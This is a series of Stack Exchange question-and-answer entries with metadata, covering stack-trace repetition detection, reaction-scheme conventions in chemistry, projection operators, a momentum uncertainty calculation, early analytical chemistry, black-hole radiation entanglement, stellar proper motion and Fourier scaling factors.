at typechecker.Typers$Typer.typed(Typers.scala:5618)
at typechecker.Typers$Typer.typedQualifier(Typers.scala:5723)
at typechecker.Typers$Typer.typedQualifier(Typers.scala:5731)
at transform.Erasure$Eraser.adaptMember(Erasure.scala:714)
at transform.Erasure$Eraser.typed1(Erasure.scala:789)
-------------------------------------------------------------
at typechecker.Typers$Typer.runTyper$1(Typers.scala:5640)
at typechecker.Typers$Typer.typedInternal(Typers.scala:5672)
at typechecker.Typers$Typer.body$2(Typers.scala:5613)
at typechecker.Typers$Typer.typed(Typers.scala:5618)
at typechecker.Typers$Typer.$anonfun$typed1$38(Typers.scala:4752)
I'm not sure how feasible this is, but I'd be happy with any and all possible solutions, even if they have their own limitations and constraints. Preliminary Googling didn't find me anything, but quite likely I just don't know what to google.
Answer: Under normal circumstances, the JVM fills in only the last 1024 calls of a stacktrace, and in Dotty/Scalac most stack overflows have a repeating fragment of length ≈ 70 or less. A stacktrace T of a StackOverflowError can be decomposed into three parts S · R^N · P, where R is the repeating part of the stacktrace, S is some suffix of R, and P is either some prefix of R or an unrelated sequence of calls. We are interested in a solution such that the total length C = |S · R^N| of the repeating part and N are both maximal, and |S| is minimal.
// Scala Pseudocode (beware of for comprehensions)
//
// Stack is assumed to be in reverse order,
// most recent stack frame is last.
val stack: Array[StackTraceElement]
val F: Int // Maximum size of R.
val candidates = for {
// Enumerate all possible suffixes S.
S <- ∀ prefix of stack
if |S| < F
// Remove the suffix from the stack,
R <- ∀ non-empty prefix of stack.drop(|S|)
// Find a fragment that ends with S.
if R.endsWith(S)
// Find out how many fragments fit into the stack.
// (how many times we can remove R from the stack)
N = coverSize(R, stack.drop(|S|))
if N >= 2 // Or higher.
} yield (S, R, N)
// Best cover has maximum coverage,
// minimum fragment length,
// and minimum suffix length.
val bestCandidate = candidates.maxBy { (S, R, N) =>
val C = |S| + |R| * N
return (C, -|R|, -|S|)
}
The entire algorithm can be implemented in a way that does not allocate any memory (to handle OOM). It has complexity O(F^2 |T|), but exceptions are rare enough and this is a small constant (F << 1024, T = 1024).
I have implemented this exact algorithm in my library https://github.com/hobwekiva/tracehash (https://github.com/hobwekiva/tracehash/blob/master/src/main/java/tracehash/internal/SOCoverSolver.java) for the same purpose of simplifying scalac/dotc errors ;)
EDIT: Here is an implementation of the same algorithm in Python:
stack = list(reversed([3, 4, 2, 1, 2, 1, 2, 1, 2, 1, 2]))
F = 6
results = []
for slen in range(0, F + 1):
suffix, stack1 = stack[:slen], stack[slen:]
for flen in range(1, F + 1):
fragment = stack1[:flen]
if fragment[flen - slen:] != suffix:
continue
stack2 = stack1[:]
n = 0
while stack2[:flen] == fragment:
stack2 = stack2[flen:]
n += 1
if n >= 2: # A heuristic, might want to set it a bit higher.
results.append((slen, flen, n))
def cost(t):
s, r, n = t
c = s + r * n
return (c, -r, -s)
S, R, N = max(results, key=cost)
print('%s · %s^%d · %s' % (stack[:S], stack[S:S+R], N, stack[S+R*N:]))
# Prints [] · [2, 1]^4 · [2, 4, 3]
EDIT2: Following some of the ideas from mukel's answer, here is a function https://gist.github.com/hobwekiva/b041099eb5347d728e2dacd1e8caed8c that solves something along the lines of:
stack = a[1]^k[1] · a[2]^k[2] · ...
argmax (sum |a[i]| * k[i] where k[i] >= 2,
-sum |a[i]| where k[i] >= 2,
-sum |a[i]| where k[i] == 1)
It is greedy so it is not necessarily an optimal solution, but it seems to work reasonably well in simple cases, e.g. given
stack = list(reversed([
3, 4, 2,
1, 2, 1, 2, 1, 2, 1, 2,
5,
4, 5, 4, 5, 4, 5,
3, 3, 3, 3]))
it produces an answer
[([3], 4), ([5, 4], 3), ([5], 1), ([2, 1], 4), ([2, 4, 3], 1)] | {
"domain": "cs.stackexchange",
"id": 12975,
"tags": "algorithms, strings, substrings"
} |
When writing out synthetic reaction schemes, why are some reactions combined in one arrow? | Question: An example of what I mean is here in the synthesis of compound 13. The reaction of the first arrow describes a single reaction, whereas the second arrow to form the final compound seems to have five stages combined into one. I understand that the compound is carried on as is without characterization when the parts are combined into a single step.
If one were designing a new synthesis, what factors would lead one to write (and characterize) each step of the synthesis versus combining many individual reactions in one apparent step?
P. S. This is not an organic chemistry question per se, but meta-ochem (sorry if my tags are limited in description).
Answer: I want to start off by saying that your example is a particularly bad one. Usually, the arrows in a scheme should at least state a list of reagents and steps. Instead, I would love to discuss this using scheme 7 of Zhang et al.’s Beilstein J. Org. Chem. article.[1] (Beilstein J. Org. Chem. is an open access journal; the full text should be accessible from the DOI link provided below.)
The main reason for combining reactions like this is brevity. For example, every practicing chemist will immediately understand that the homoallyl Grignard under 1. will attack one of the carbonyl functions, that triethylsilane will reduce an oxygen and that TBAF will remove the silyl protecting group on the hydroxy function. None of these steps really warrant any discussion and most people would be able to draw out the missing structures in a few minutes. Likewise, I am not entirely sure why they did not include the preceding protection in that same reaction scheme, because there too there is nothing interesting going on.
In more advanced synthetic schemes, the steps that are shortened and written together on a single arrow are often typical name reactions or very easily performed ones:
protections and deprotections
oxidations of alcohols to aldehydes with standard reagents
reductions with DIBAL, LAH or $\ce{NaBH4}$
ozonolyses
double bond isomerisations
simple Wittig/HWE reactions
etc.
They are typically chosen in such a way that the path is obvious and that the structure on the end of the arrow can be drawn up quickly by going through the steps. They will practically never include key steps or steps whose stereochemical outcome is uncommon. Cross-couplings of more elaborate structures or lesser known name reactions are also less common.
However, there is no rule as to what can be combined and what cannot. If anything, the reviewers might mark a scheme as too elaborate (i.e. can be shortened) or too brief (needs elaboration).
Reference:
[1]: J. Zhang, H.-K. Zhang, P.-Q. Huang, Beilstein J. Org. Chem. 2013, 9, 2358–2366. DOI: 10.3762/bjoc.9.271. | {
"domain": "chemistry.stackexchange",
"id": 8935,
"tags": "organic-chemistry, synthesis, notation"
} |
What is the standard definition of "projector", "projection" and "projection operator"? | Question: What is the precise meaning of "projector", "projection" and "projection operator"? I always thought these terms were synonyms, but I have seen both used in a quantum optics paper where the former is not the same as the latter. There the projector was defined as $(I_S|0)$ and the projection operator as
$\begin{pmatrix}
I_S & 0\\
0 & 0 \\
\end{pmatrix}$
with $I_S$ being the identity for a subspace $S$. So the first is a block-vector and the second a block-matrix? I have never seen such a distinction before and could not find any material about that online.
Answer: Usually, people will use all of these words interchangeably, to mean what your source calls a "projection operator". As for what your source means, note that
a linear transformation is a linear map $T: V \to W$ for vector spaces $V$, $W$
a linear operator is a linear map $T: V \to V$ for a vector space $V$
We are always working with linear transformations, but sometimes one may specify a transformation is an operator to emphasize that the input and output space are the same.
A projection can be thought of in either way. Suppose that the projection maps vectors in $V$ to a subspace $W$ of $V$. Then we can think of it as a linear transformation $T: V \to W$ where $W$ is regarded as a vector space of its own (what your source calls a projector, represented by a non-square matrix), or we can think of it as a linear operator $T: V \to V$ where the image happens to be $W \subset V$ (which your source calls a projection operator). Making such a distinction might be useful if you want to be very explicit about what the spaces are, but it's not standard. | {
"domain": "physics.stackexchange",
"id": 47661,
"tags": "quantum-mechanics, operators, quantum-information, definition, linear-algebra"
} |
Calculation of $\langle p\rangle$ and $\langle p^2\rangle$ for wave function | Question:
Given the wave function $$\psi(x)=A\exp\left[-a
\left(\frac{mx^{2}}{\hbar}+it\right)\right]$$ I would like to calculate $\sigma_{p}$.
\begin{align}\langle p\rangle &=\int \psi^{\star}\left(\frac{\hbar}{i}\frac{\partial}{\partial x}\right)\psi dx\\
&=2imaA^{2}\int xe^{-kx^{2}}dx\\
&=0
\end{align}
since the integrand is odd. (I let $k=\frac{2am}{\hbar}$)
Similarly,
\begin{align}
\langle p^2\rangle &=\int \psi^{\star}\left(\frac{\hbar}{i}\frac{\partial}{\partial x}\right)^{2}\psi dx\\
&=-2A^{2}ma\hbar \left[\int kx^{2}e^{-kx^{2}}dx-\int e^{-kx^{2}}dx\right]\\
&=-2A^{2}ma\hbar\left[\frac{1}{2} \sqrt{\frac{\pi}{k}}-\frac{1}{2} \sqrt{\frac{\pi}{k}}\right]\\
&=0 \end{align}
But doesn't this imply $\sigma_{p}=\sqrt{\langle \widehat p^{2}\rangle -\langle \widehat p\rangle ^{2}}=0$ ?
I think that I must have made a mathematical error, because this result as it stands would violate the uncertainty principle as I understand it: $\sigma_{x}\sigma_{p}\geq\frac{\hbar}{2}$
But I don't see anything incorrect. Does $\sigma_{p}=0$ violate the uncertainty principle?
Answer: There is an error in my calculation.
In fact: $\int ^{\infty}_{-\infty} e^{-kx^{2}}dx = \sqrt{\dfrac{\pi}{k}}$
So $$\langle \widehat p^{2} \rangle=-2A^{2}ma\hbar [\frac{-1}{2}\sqrt{\frac{\pi}{k}}]=ma\hbar$$ given that $A^{2}=\sqrt{\frac{2am}{\pi\hbar}}$ as calculated using the normalization condition.
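As an added numerical cross-check (a sketch of mine, not part of the original answer; standard library only, in units where $m=a=\hbar=1$, so $\langle p^{2}\rangle$ should come out as $1$ and $\sigma_{x}\sigma_{p}$ as $1/2$):

```python
import math

# Gaussian packet with m = a = hbar = 1: psi(x) = (2/pi)**0.25 * exp(-x**2).
# Then <p^2> = ∫ |psi'(x)|^2 dx (integration by parts) and <x^2> = ∫ x^2 psi^2 dx.
dx = 1e-4
xs = [i * dx for i in range(-60000, 60001)]            # grid over [-6, 6]
psi = [(2 / math.pi) ** 0.25 * math.exp(-x * x) for x in xs]
dpsi = [-2 * x * p for x, p in zip(xs, psi)]           # psi'(x)
p2 = sum(d * d for d in dpsi) * dx                     # <p^2> -> m*a*hbar = 1
x2 = sum(x * x * p * p for x, p in zip(xs, psi)) * dx  # <x^2> -> hbar/(4ma) = 1/4
print(round(p2, 3), round((x2 * p2) ** 0.5, 3))        # → 1.0 0.5
```

The product $\sqrt{\langle x^{2}\rangle\langle p^{2}\rangle}=1/2$ saturates the uncertainty bound, as expected for a Gaussian.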
This can be used to calculate $$\sigma_{p}=\sqrt{ma\hbar}$$ It can similarly be shown that $$\langle x^{2}\rangle=\frac{\hbar}{4ma}$$ and $$\langle x \rangle= 0$$ so $$\sigma_{x}=\sqrt{\frac{\hbar}{4ma}}$$ and finally: $$\sigma_{p}\sigma_{x}=\sqrt{\frac{\hbar^{2}ma}{4ma}}=\frac{\hbar}{2}\geq\frac{\hbar}{2}$$ which agrees with the uncertainty principle. | {
"domain": "physics.stackexchange",
"id": 19329,
"tags": "quantum-mechanics, homework-and-exercises, operators, wavefunction, heisenberg-uncertainty-principle"
} |
Recursive bytearray hash function | Question: I need a function that hashes a list of different inputs (integral datatypes, strings, bytearrays) in a recursive manner.
def RecHash(v):
    isSingleElementOfList = False
    if type(v) is list and len(v) == 1:
        isSingleElementList = True
    if type(v) is not list or isSingleElementOfList: # if v is a single element
        v0 = v
        if isSingleElementOfList: v0 = v[0]
        if type(v0) is bytearray or v0.__class__.__name__ == 'bytes':
            return hash(v0)
        if type(v0) is int:
            return hash(ToByteArray(v0))
        if type(v0) is str:
            return hash(v0.encode('utf-8'))
        return bytes()
    else: # if v is a list
        res = bytearray()
        for vi in v:
            res += RecHash(vi) # recursion
        return hash(res) # hash the concatenated hashes
and the helper function:
def ToByteArray(x):
    q, r = divmod(BitAbs(x), 8)
    q += bool(r)
    return ToByteArrayN(x, q)

def ToByteArrayN(x, n):
    B = bytearray()
    for i in range(0, int(n)):
        b = x % 256
        x = x // 256 # // = integer division => floor
        B.insert(0, b)
    return bytes(B)

def BitAbs(i):
    return i.bit_length()
It is working fine; however, it's very slow (and interestingly, it's not the hash() function that is slowing it down).
Performance is worst when the list contains mostly numbers, so the ToByteArray function also doesn't seem to perform well.
Answer: As @pjz already noted in his answer, type(v0) is slow. However, I would recommend using isinstance instead. This allows you to use your class also with derived types. From help(isinstance):
isinstance(...)
    isinstance(object, class-or-type-or-tuple) -> bool

    Return whether an object is an instance of a class or of a subclass thereof.
    With a type as second argument, return whether that is the object's type.
    The form using a tuple, isinstance(x, (A, B, ...)), is a shortcut for
    isinstance(x, A) or isinstance(x, B) or ... (etc.).
Imagine if I rolled my own int class, Int, which is derived from the base int class:
class Int(int):
    pass
Your RecHash function would not work with this. If you use isinstance(v0, int), though, this would still be working.
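To make that concrete (a short sketch of mine, not part of the original answer):

```python
class Int(int):
    pass

v = Int(7)
print(type(v) is int)      # → False: the exact-type check rejects the subclass
print(isinstance(v, int))  # → True: isinstance accepts derived types too
```

That is exactly why the exact-type comparisons in RecHash silently fall through to the empty-bytes branch for subclassed inputs.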
if isinstance(v, list) and len(v) == 1:
    isSingleElementList = True
if not isinstance(v, list) or isSingleElementOfList: # if v is a single element
    v0 = v[0] if isSingleElementOfList else v
    type_v0 = type(v0)
    if isinstance(v0, bytearray) or v0.__class__.__name__ == 'bytes':
        return hash(v0)
    if isinstance(v0, int):
        return hash(ToByteArray(v0))
    if isinstance(v0, str):
        return hash(v0.encode('utf-8'))
else: # if v is a list
    res = bytearray()
    for vi in v:
        res += RecHash(vi) # recursion
    return hash(res) # hash the concatenated hashes
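One performance note I'd add (not part of the original answer): the hand-rolled ToByteArray/ToByteArrayN loop can be replaced by the built-in int.to_bytes, which does the same big-endian conversion in C and should help with the reported slowness on number-heavy lists.

```python
# Sized like the original helper (ceil(bit_length / 8)), with at least
# one byte so that x = 0 still produces output.
x = 123456789
n = max(1, (x.bit_length() + 7) // 8)
print(x.to_bytes(n, 'big'))  # → b'\x07[\xcd\x15'
```

int.from_bytes does the reverse conversion, so round-tripping is trivial to verify.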
Python has an official style-guide, PEP8. It recommends using lower_case for variable and function names, instead of PascalCase or camelCase. | {
"domain": "codereview.stackexchange",
"id": 24595,
"tags": "python, performance, python-3.x"
} |
A puzzle about how to write more clean and understandability code | Question: private function getFeatureByParam ($classname, $module, $action) {
    $needFeature = array();
    foreach ($this->featureConf as $featureIndex => $feature) {
        if ($feature['classname'] == $classname &&
            $feature['module'] == $module &&
            $feature['action'] == $action) {
            $needFeature = $feature;
            break;
        }
    }
    return $needFeature;
}
private function getFeatureByParam ($classname, $module, $action) {
    foreach ($this->featureConf as $featureIndex => $feature) {
        if ($feature['classname'] == $classname &&
            $feature['module'] == $module &&
            $feature['action'] == $action) {
            return $feature;
        }
    }
    return array();
}
The first style of writing is more understandable.
The second style of writing is cleaner and more efficient.
But which one is better? (Or are they both bad?)
Answer: Personally, option 2.
In option 1, by breaking out of the loop, you have to look down past the end of the loop to see what happens next, only to find a plain return.
In option 2, it's obvious what you want and when you get it. Although, I think the condition is a little complex.
There are, of course, other options:
private function getFeatureByParam ($classname, $module, $action) {
    foreach ($this->featureConf as $featureIndex => $feature) {
        if ($feature['classname'] != $classname) continue;
        if ($feature['module'] != $module) continue;
        if ($feature['action'] != $action) continue;
        return $feature;
    }
    return array();
}
private function getFeatureByParam ($classname, $module, $action) {
    foreach ($this->featureConf as $featureIndex => $feature) {
        if ( featureMatches( $feature, $classname, $module, $action ) ) {
            return $feature;
        }
    }
    return array();
}
I'm inclined to option 4 :) | {
"domain": "codereview.stackexchange",
"id": 2934,
"tags": "php"
} |
What is the typical career path to become a professional Astronomer? | Question: Here is a typical question which I have been asked many times while giving public lectures in various places. While I know one of the paths (Diploma, Masters and PhD), this is often not so obvious to the eager young person who is thinking of going down that path. So what would that path be?
Answer: You start out getting a Bachelor of Science in a related field. This could be physics, astronomy, mathematics, or possibly chemistry. Depending on which country you are planning to go to grad school in, specializing at this stage may not be as important as in later stages. However, note that in the UK, for example, it is almost unheard of for a student without a Bachelors in physics (almost always with a minor in astrophysics) to gain a place in grad school for astronomy.
After doing the BSc, you would go on to get a Masters degree in astronomy, which would set the stage for a PhD in astronomy. The PhD (and to some extent, the MSc) will have you specialize in a specific area in astronomy, such as star formation, planetary studies, or cosmology.
After doing the PhD, you would get a post-doc at a university or research institute. This is typically a three-year job where you do research in your chosen area. Most astronomers do two or three post-docs.
After this, you could become a professor or research associate at a university or an in-house research astronomer at an observatory. Universities or observatories are typically the only places to be a "professional astronomer", and depending on the position, would give you time to do your own research in conjunction with other duties like teaching. | {
"domain": "physics.stackexchange",
"id": 2964,
"tags": "astronomy, education"
} |
How did early chemists measure concentrations and purity? | Question: My chemistry teacher loves going back through the history of famous chemists. This got me wondering how these chemists would first determine the concentration of a sample before they had any other chemicals of known concentration to compare against?
What modern methods are there for determining concentrations and purity without other chemical standards to compare against?
Let me explain my question a little more clearly with an example.
If a historical scientist starts their own laboratory and wanted to do a titration, how would they start? They might produce some hydrochloric acid, or some barium sulfate, and want to confirm its concentration/purity. However, this would require they already know the concentration of something else, which they don't. So it seems a little paradoxical. How did they ever start performing analytical experiments?
Answer: Not everything comes as a solution. Rather, the historical chemist would have started off with solid substances. These were purified according to ‘established procedures’ (distillation, recrystallisation, dissolution and precipitation) which worked quite well. Then, one of these substances would have been used to make a stock solution — and because it is solid you can simply weigh it.
Now you might assume that the historical chemist had no knowledge on how two substances would react — which is likely true. However, once he knew the composition of one type of solution, he was able to express the other in equivalents: ‘this solution is able to reduce two equivalents of the permanganate solution’ (using the first example that jumped to my head; not sure whether that is actually a likely thought).
Going via the diversion of analytical chemistry (is this a compound or an element?), it was established that a law of multiple proportions existed: if two elements form more than one compound, the mass ratio of one of those elements is always a simple integer ratio. This was easily extended to reactions: if something reacted with 2 equivalents of A but 1.5 equivalents of B, then maybe it wasn’t the concentration I assumed but I should multiply by two?
Over time and more data points, the current system would have been established. | {
"domain": "chemistry.stackexchange",
"id": 6844,
"tags": "analytical-chemistry, titration, history-of-chemistry"
} |
Bell inequality as a game: Why is it impossible to always win? | Question: Another Bell's Theorem Question
I am trying to follow the simple model of Bell's Theorem outlined in this paper: https://people.eecs.berkeley.edu/~vazirani/s07quantum/notes/lecture1.pdf. Please read section 5 for details, but basically he outlines a communication protocol where two people $A$ and $B$ receive a bit each ($X_a$ and $X_b$). They then each have to independently produce new bits ($a$ and $b$). $A$ and $B$ are trying to cooperatively maximize the probability that $$a\ XOR\ b = X_a\ AND\ X_b$$
There is a trivial strategy that wins 75 percent of the time. Always produce $a$ and $b$ of 0. The last section describes the strategy that wins more than 75% of the time in quantum mechanics and disproves 'local hidden variables'. From my understanding a local hidden variable theory would be one where the two particles before they were separated planned out every possible result of any possible experiment that could be performed once they are separated. This way there was no FTL communication.
My questions are as follows:
If in the quantum version of the game they always have the EPR pair, then why can't they win 100 percent of the time? If A measures 1 he produces 1 and B always produces 0. I don't get what this has to do with quantum mechanics, since this strategy could be devised even if hidden variable theory were 'true' and the two particles 'agreed' on their configurations before they were separated in space.
In the protocol at the end he says if $X_a$ = 0 then do a certain measurement. What is the output produced by the strategy? It is very unclear. Is the output the result of the measurement?
Also, don't you have to perform a measurement to know that $X_a$ = 0? Wouldn't this already affect the state of the EPR pair before you made the second measurement?
Am I fundamentally missing something?
Answer: According to the source: Alice and Bob are each handed a single random classical bit $X_a$ and $X_b$ and they also share a pair or maximally entangled qubits in the state $|\psi\rangle=(|00\rangle+|11\rangle)/\sqrt{2}$.
Now based on this $X_a ∧ X_b = 0$ unless both $X_a$ and $X_b=1$ (definition of the logical "and" operator, $∧$). Because $X_a$ and $X_b$ are random and independent, this means that $X_a ∧ X_b$ is random and $=0$ 75% of the time and =1 only 25% of the time.
Now you are correct that Alice and Bob can always guarantee that the outcomes of their measurements are the same if they both measure in the same basis, or always opposite (e.g. one measures in the $|0\rangle$ or $|1\rangle$ basis and the other measures in the swapped, $|1\rangle$ or $|0\rangle$ basis). However, taking the xor operation on the output means that Alice and Bob can choose to always have $a⊕b=0$ (by measuring in the same bases) or $a⊕b=1$ (by measuring in the swapped bases). Therefore, always choosing a deterministically correlated/anti-correlated measurement scheme means that you only win either 25% or 75% of the time (because, remember, $X_a ∧ X_b =0$ 75% of the time and $=1$ 25% of the time).
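For intuition on why 75% is the classical ceiling (a brute-force sketch I'm adding, not from the lecture notes): shared randomness can never beat the best deterministic strategy, so it suffices to check all 16 deterministic strategies.

```python
from itertools import product

# Each deterministic classical strategy is a pair of lookup tables:
# fa[x] is Alice's output on input bit x, fb[y] is Bob's output on y.
best = 0.0
for fa in product((0, 1), repeat=2):
    for fb in product((0, 1), repeat=2):
        wins = sum((fa[x] ^ fb[y]) == (x & y) for x in (0, 1) for y in (0, 1))
        best = max(best, wins / 4)
print(best)  # → 0.75
```

The quantum strategy described in the notes instead wins with probability $\cos^2(\pi/8)\approx 0.854$, which no row of this classical table can reach.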
Because $X_a$ and $X_b$ are random and independent, Alice and Bob gain no information from the actual value of their random bit and so can't use this information alone to do better than 75%. However, since the $X_a ∧ X_b$ outcome is random but biased, they can use the rules of quantum mechanics to create random bits $a$ and $b$ that are biased in such a way as to get higher than 75% by measuring in different bases as given by the example in the reference. However, maximizing over possible measurement schemes never gives you 100% (and the answer in the reference is the maximum probability you can win). | {
"domain": "physics.stackexchange",
"id": 53524,
"tags": "quantum-mechanics, quantum-interpretations, bells-inequality"
} |
How do I force Cromwell / WDL to put input files in the same directory? | Question: I have a Cromwell task that takes, among other variables, these three:
File Ref # Reference genome fasta
File RefFai # Reference Genome index
File RefDict # Reference Dictionary
While all three files make it into the task's "inputs" directory, they end up in different sub-directories of inputs:
ME $ find inputs
inputs
inputs/-181926642
inputs/-181926642/Sample.vcf.bgz.tbi
inputs/-181926642/Sample.vcf.bgz
inputs/-1548908437
inputs/-1548908437/GCA_000001405.15_GRCh38_no_alt_short_headers_nonACTG_to_N.dict
inputs/44588251
inputs/44588251/GCA_000001405.15_GRCh38_no_alt_short_headers_nonACTG_to_N.fa
inputs/44588251/GCA_000001405.15_GRCh38_no_alt_short_headers_nonACTG_to_N.fa.fai
Which means that when I call GATK and pass it the path to the .fa file, it gets rather cranky that the .dict file isn't in the same directory.
How do I force Cromwell to put all three files in the same directory?
Answer: My hacktastic fix for this is to use basename to get the name of each file, then do
refName=`basename "${Ref}"`
ln -s "${Ref}" "$refName"
for each file. This puts aliases to each file in the executions dir, and then I pass "refName" to GATK rather than "${Ref}".
Not a good solution, but a solution | {
"domain": "bioinformatics.stackexchange",
"id": 2474,
"tags": "wdl"
} |
How does temperature change in a system after removing a certain mass (at first order) | Question: Let's say I have a volume $V$ filled with water of temperature $T$. Now I remove a mass of water, $\Delta m$, and I want to know how this affects the temperature in V at first order neglecting all other heat transfer in and out of the volume and other fancy stuff. I would take
a simple form of the equation of energy balance so that temperature change in $V$ reflects the energy $Q$ that is taken out:
$$
V\rho c \Delta T = Q
$$
where $\rho$ is the density and $c$ is the specific heat capacity.
Now I have 3 questions.
1) Does the removal of the mass have any effect on temperature at all?
If yes, 2) Can I assume that the energy of the removed mass is
$$
Q = c \Delta m T
$$
or is this wrong? If it's possible, then 3) do I use temperature in °Celsius or in Kelvin?
$c$ is sometimes reported with °C and sometimes with K, because, as I understand it, it usually relates to a temperature difference rather than absolute temperature (meaning it doesn't make a difference). Used with an absolute temperature (as in this case, unless I'm wrong) it does make a difference though, so I'm not sure how to handle this here.
Answer: Let's consider what will happen when we remove that mass.
For starters, we assume this has homogeneous temperature.
Now, the first thing that seems to be confusing you may be how they define heat energy. It's relative. You are not measuring the absolute heat of the water, you are measuring the heat added (or removed) when going from one temperature to another ($\Delta T$).
You said we are not considering the heat transfer. When you remove a mass, you aren't replacing it with cold water; you're just not considering it as part of your system anymore.
Your value of $Q$ (heat) will change, because you now have less of the warm object. The value of $\Delta T$ will remain the same; because you didn't allow for any heat transfer to lower the temperature.
Let's say you had 2 apples sitting beside each other at the same temperature. They have a heat energy associated with their temperature, mass, and heat capacity ($Q=mc\Delta T$). If you take away one apple, consider what happens to the remaining apple. It does not suddenly lose temperature just because there is no other apple there. Instead, the whole system has less thermal energy ($Q$) due to the lower mass. $\Delta T$ remains constant. | {
"domain": "physics.stackexchange",
"id": 40667,
"tags": "thermodynamics, energy, temperature"
} |
Is mass the only factor which affects Newton's Third Law? | Question: I've had a hard time understanding Newton's third law. From my textbooks, it can be inferred that the reaction of the object differs based on its mass. For example, if skater A pushes skater B, the lighter skater will accelerate further. However, based on readings on this website, other factors such as friction are being discussed in for example, a person pushing a table.
This has confused me, and it would be of great help if someone were to help me truly understand this law.
Answer:
For example, if skater A pushes skater B, the lighter skater will accelerate further.
Good enough so far.
But you should be careful about the reasoning. Newton's third law says that when skater A pushes on skater B, there is an equal force applied by skater B to skater A (Mass isn't actually a consideration in Newton's third law). It's Newton's second law that tells you this will result in the lighter skater experiencing more acceleration.
However, based on readings on this website, other factors such as friction are being discussed in for example, a person pushing a table.
Friction doesn't change Newton's laws. It just introduces a third object (the Earth) into the system.
Newton's third law says, if I push on the table, there is an equal force pushing back on me. Friction means that the table will also be pushing on the Earth beneath it, and (because of Newton's third law) the Earth will also push back on the table. Newton's third law hasn't changed, we just have to consider two interactions where it applies, instead of one. | {
"domain": "physics.stackexchange",
"id": 72348,
"tags": "newtonian-mechanics, forces, mass, free-body-diagram"
} |
(Why) does the late radiation after page time entangle with the early radiation? | Question: In the Jerusalem lectures by Harlow, pg. 53, it is said that
At the beginning of the
evaporation process the radiation that comes out is entangled with the remaining black
hole. But eventually it must start coming out entangled with the earlier radiation,
since eventually the final state of the radiation must be pure.
Why is the late radiation, i.e. the radiation that comes out after the Page time, entangled with the earlier radiation (so as to purify the total state) instead of being entangled with the remaining black hole?
Is it because the black hole has a different state space?
I found a supposed answer by Polchinski
With the black hole, the internal excitations are behind the horizon, and cannot influence the state of later photons.
So it seems Polchinski is using causality to argue against entanglement with interior modes. But why won't it then hold for early photons? (He does use the word "late", and we know the early modes are entangled with the interior.)
Instead I would expect by Page's theorem that the remaining old black hole is maximally mixed and forms a maximally entangled pure state with the early radiation at late times, but then why isn't this mentioned in Harlow's quote?
I can understand the Page curve and its qualitative derivation as given in Harlow, but not the "intuitive" description that follows the derivation on pg. 53. How does one deduce, from the Page curve itself, what couples with what after the Page time?
Condensing these questions amounts to asking the titular question, which can be expanded and rephrased as:
Does the small old black hole entangle with the early radiation, or does the late radiation, and why?
Answer: This is a basic consequence of the assumption (made on pag. 47) that the black hole evaporation process is unitary. Since the radiation must eventually be in a pure state and the black hole will evaporate, the late radiation must somehow purify the early radiation. Explaining in detail how this happens is part of solving the information paradox, on which we recently made some progress in AdS/CFT; see for instance results by Penington such as Entanglement Wedge Reconstruction and the Information Paradox. | {
"domain": "physics.stackexchange",
"id": 99381,
"tags": "black-holes, quantum-information, thermal-radiation, hawking-radiation, ads-cft"
} |
Fourier transform of dirac comb with function: The scaling factor | Question: Multiplication in the time domain corresponds to convolution in the frequency domain:
$$
f(t) \cdot x(t) \iff F(j \omega) * X( j \omega) \tag*{No scaling factor}
$$
I know the Fourier transform of the Dirac comb is:
$$
\mathcal{F} \big \{ \text{III}_{T_{s}} (t) \big \} = \omega_{s} \cdot \text{III}_{\omega_{s}} (j \omega)
$$
But according to Oppenheim and others:
$$
\mathcal{F} \big \{ f(t) \cdot \text{III}_{T_{s}} (t) \big \} = \underbrace{\dfrac{1}{T_{s}}}_{\text{scaling factor}} \cdot \displaystyle \sum_{k = - \infty}^{\infty} F(j( \omega - k \omega_{s} )) \tag*{Scaling factor}
$$
So my question is: for the above, why does the scaling factor not remain $\omega_{s}$, and why does it become $\dfrac{1}{T_{s}}$?
Which means that
$$
x(t) \cdot y(t) \iff \dfrac{1}{2 \pi} X(j \omega) * Y(j \omega) \tag{ ??? }
$$
Why does the scaling factor not remain the angular sampling frequency?
Answer: Your first formula is wrong. If you use angular frequency ($\omega$), then multiplication in the time domain corresponds to $1/(2\pi)$ times convolution in the frequency domain, just as in the last formula in your question:
$$\mathcal{F}\{x(t)\cdot y(t)\}=\frac{1}{2\pi}X(j\omega)\star Y(j\omega)\tag{1}$$
If you use frequency $f=\omega/(2\pi)$, then you get
$$\mathcal{F}\{u(t)\cdot v(t)\}=U(f)\star V(f)\tag{2}$$
where I've used the definitions
$$X(j\omega)=\int_{-\infty}^{\infty}x(t)e^{-j\omega t}dt\tag{3}$$
$$U(f)=\int_{-\infty}^{\infty}u(t)e^{-j2\pi f t}dt\tag{4}$$ | {
"domain": "dsp.stackexchange",
"id": 7472,
"tags": "discrete-signals, sampling, fourier, dirac-delta-impulse"
} |
How are the transverse velocity and proper motion of a star related? | Question: For a star the proper motion, $\mu$, is usually measured in arcseconds per year. The diagram below illustrates how the quantities of radial, tangential and true velocity are related. The radial and tangential velocities are clearly components of the true velocity that have been resolved usefully relative to an observer on the Sun.
Given a known value of $\mu$, this link states that the tangential velocity, $V_\theta$, is related to the proper motion by the equation
$$V_\theta = 4.7\mu d$$
where $d$ is the distance, and $V_\theta$ is the tangential velocity. I am unsure of where the factor of $4.7$ comes from. However, other sources give it as $V_\theta = \mu d$, although they do not define any units.
Could anyone confirm the units of the above quantities, and which equation is correct, as well as the origin of the 4.7?
Answer: Both equations are correct. The factor of $4.7$ comes from the unit conversion:
$$\frac{({\rm arcsec}\,{\rm yr}^{-1})({\rm pc})}{{\rm km}\,{\rm s}^{-1}} = \frac{(4.84\times10^{-6}\,{\rm rad})\,(3.154\times10^{7}\,{\rm s})^{-1}(3.086\times10^{13}\,{\rm km})}{{\rm km}\,{\rm s}^{-1}} = 4.7$$
Note that I've used the "small angle approximation" $\sin(x)\approx x$ for $x\approx0$, so I can treat ${\rm rad}$ as dimensionless.
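The arithmetic can be checked in a couple of lines (a sketch I'm adding, not from the original answer), using the same standard constants as the equation above:

```python
# Unit-conversion factor from (arcsec/yr) * pc to km/s.
arcsec_in_rad = 4.84e-6   # 1 arcsecond in radians
year_in_s = 3.154e7       # 1 year in seconds
pc_in_km = 3.086e13       # 1 parsec in kilometres
factor = arcsec_in_rad * pc_in_km / year_in_s
print(round(factor, 1))   # → 4.7
```

With more decimal places the factor comes out closer to 4.74, which is the value usually quoted in textbooks.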
If you use simple $V_{\theta}=\mu d$, you will get the same answer, but when you input the values you'll need to do any applicable unit conversion yourself. | {
"domain": "physics.stackexchange",
"id": 90321,
"tags": "astrophysics, astronomy, velocity, distance"
} |
